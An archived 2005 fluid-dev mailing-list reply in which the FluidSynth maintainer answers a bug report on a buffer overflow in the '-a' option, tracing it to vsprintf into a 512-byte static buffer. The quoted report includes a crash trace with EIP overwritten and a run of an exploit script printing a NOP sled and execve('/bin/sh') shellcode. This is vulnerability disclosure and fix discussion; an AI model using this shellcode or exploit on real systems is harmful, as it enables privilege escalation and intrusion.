[Top][All Lists]
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [fluid-dev] Bug Report: -a overflow
From: |
Josh Green |
Subject: |
Re: [fluid-dev] Bug Report: -a overflow |
Date: |
Wed, 09 Feb 2005 00:00:11 -0800 |
On Mon, 2005-02-07 at 18:07 +0100, Axioplase wrote:
> fluidsynth can be exploited through an overflow when passing an argument
> to the "-a" option.
> See attached bug report.
>
> Though there isn't a big risk that fluidsynth is suid root, that's a bug
> anyway...
>
> Axioplase.
>
> plain text document attachment (BugReport)
> $ uname -a 17:55
> FreeBSD XXX.YYY 5.3-RELEASE FreeBSD 5.3-RELEASE #0: Fri Nov 5 04:19:18 UTC
> 2004 address@hidden:/usr/obj/usr/src/sys/GENERIC i386
> $ fluidsynth --version 17:55
> fluidsynth 1.0.3
>
> $fluidsynth -a `perl -e 'print "A"x500'`
> segmentation fault (core dumped) fluidsynth -a `perl -e 'print "A"x500'`
>
> $gdb -core fluidsynth.core
> GNU gdb 6.1.1 [FreeBSD]
> Copyright 2004 Free Software
> Foundation, Inc.
> GDB is free software, covered by the GNU General Public License, and you are
> welcome to change it and/or distribute copies of it under certain conditions.
> Type "show copying" to see the conditions.
> There is absolutely no warranty for GDB. Type "show warranty" for details.
> This GDB was configured as "i386-marcel-freebsd".
> Core was generated by `fluidsynth'.
> Program terminated with signal 11, Segmentation fault.
> #0 0x41414141 in ?? ()
> (gdb) info reg
> eax 0x41414141 1094795585
> ecx 0x0 0
> edx 0x280c623e 671900222
> ebx 0x280c56a4 671897252
> esp 0xbfbfe6cc 0xbfbfe6cc
> ebp 0x280c5020 0x280c5020
> esi 0x1 1
> edi 0x280c6020 671899680
> eip 0x41414141 0x41414141
> eflags 0x10292 66194
> cs 0x1f 31
> ss 0x2f 47
> ds 0x2f 47
> es 0x2f 47
> fs 0x2f 47
> gs 0x97 151
>
>
>
> $ fluidsynth -a `./expl.pl 578 0`
> using adress 0xbfbfeb50
> using exploit
> \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
>
> 90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
>
> 90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
>
> 90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
>
> 90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
>
> 90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
>
> 90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
>
> 90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
>
> 90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
>
> 90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
>
> 90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
>
> 90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
>
> 90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
>
> 90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
>
> 90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xeb\x17\x5e\x31\xc0\x50\x88\x
>
> 46\x07\x89\x46\x08\x89\xf7\xb0\x08\x01\xc7\x57\x56\xb0\x3b\x50\xcd\x80\xe8\xe4\x
>
> ff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23\x90\x90\x90\x50\xeb\xbf\xbf\x50\xeb\x
>
> bf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\x
>
> bf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\x
>
> bf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\x
>
> bf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\x
>
> bf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\x
>
> bf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\x
>
> bf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\x
>
> bf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\x
>
> bf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\x
>
> bf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\x
>
> bf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\x
>
> bf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\x
>
> bf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\x
>
> bf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\x
> bf\xbf
>
> $ echo exploit worked > r00ted
Thanks for reporting this. I hope there aren't any people that are
running FluidSynth SUID root where security is a concern :)
Looks like its a problem with a static error buffer which is 512 bytes.
FluidSynth is trying to tell you it couldn't find a driver by that name
(500 'A's) using vsprintf on the static buffer. I was tempted to just
stick vsnprintf in there instead to limit the max length of error
output, but then recalled that this function might not be available on
all platforms. Can anyone confirm or deny this for platforms other than
Linux? (Windows and Mac OS X in particular).
Best regards,
Josh Green
signature.asc
Description: This is a digitally signed message part